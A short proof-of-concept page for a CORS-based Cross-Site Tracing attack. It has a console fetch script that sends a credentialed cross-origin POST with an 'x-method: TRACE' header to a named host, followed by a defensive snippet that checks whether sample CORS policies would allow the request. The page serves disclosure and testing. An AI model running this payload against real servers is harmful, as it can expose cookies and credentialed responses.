
CORS XST PoC

Open a new browser window on any other site (to force a cross-domain CORS request), then paste the following script into the JavaScript console of the developer tools.

fetch('https://xst.scarlet.ae', {
  method: 'POST',
  mode: 'cors',
  cache: 'no-store',
  credentials: 'include',
  headers: { 'x-method': 'TRACE' }
})
  .then(response => response.text())
  .then(text => console.log(text))
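Because the script sends a non-safelisted `x-method` header with `credentials: 'include'`, the browser preflights it, and the server's CORS policy decides whether it goes out at all. The following added example (not part of the original page) models only that preflight decision so a defender can test a policy against this request; the origin `https://other.example` and the three policies are constructed values.

```javascript
// Would a browser release this preflighted request, given the OPTIONS response headers?
const SAFELISTED_METHODS = ['GET', 'HEAD', 'POST'];
const list = v => (v || '').split(',').map(s => s.trim().toLowerCase()).filter(Boolean);

// headers: object keyed by lower-cased response header name.
function preflightAllows(headers, { origin, method, requestHeaders, credentials }) {
  const reasons = [];
  const allowOrigin = headers['access-control-allow-origin'];
  const allowHeaders = list(headers['access-control-allow-headers']);
  const allowMethods = list(headers['access-control-allow-methods']);
  const wildcard = !credentials; // "*" is taken literally once credentials are included

  if (allowOrigin !== origin && !(wildcard && allowOrigin === '*')) {
    reasons.push('origin not allowed');
  }
  if (credentials && headers['access-control-allow-credentials'] !== 'true') {
    reasons.push('credentials not allowed');
  }
  for (const h of requestHeaders.map(x => x.toLowerCase())) {
    if (!allowHeaders.includes(h) && !(wildcard && allowHeaders.includes('*'))) {
      reasons.push(`header ${h} not allowed`);
    }
  }
  const m = method.toLowerCase();
  if (!SAFELISTED_METHODS.includes(method) && !allowMethods.includes(m) &&
      !(wildcard && allowMethods.includes('*'))) {
    reasons.push(`method ${method} not allowed`);
  }
  return { allowed: reasons.length === 0, reasons };
}

// The request the script on this page sends; the origin is a constructed value.
const REQUEST = { origin: 'https://other.example', method: 'POST',
                  requestHeaders: ['x-method'], credentials: true };
// Constructed policies, not captured from any real server.
const REFLECTING = { 'access-control-allow-origin': 'https://other.example',
                     'access-control-allow-credentials': 'true',
                     'access-control-allow-headers': 'x-method' };
const STRICT = { 'access-control-allow-origin': 'https://app.example',
                 'access-control-allow-credentials': 'true',
                 'access-control-allow-headers': 'content-type' };
const WILDCARD = { 'access-control-allow-origin': '*', 'access-control-allow-headers': '*' };

for (const [name, policy] of Object.entries({ REFLECTING, STRICT, WILDCARD })) {
  console.log(name, preflightAllows(policy, REQUEST));
}
```

A policy that pins `Access-Control-Allow-Origin` to trusted origins and omits `x-method` from `Access-Control-Allow-Headers` fails the preflight, so the browser never sends the credentialed POST.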

Additional information is available here: https://attackshipsonfi.re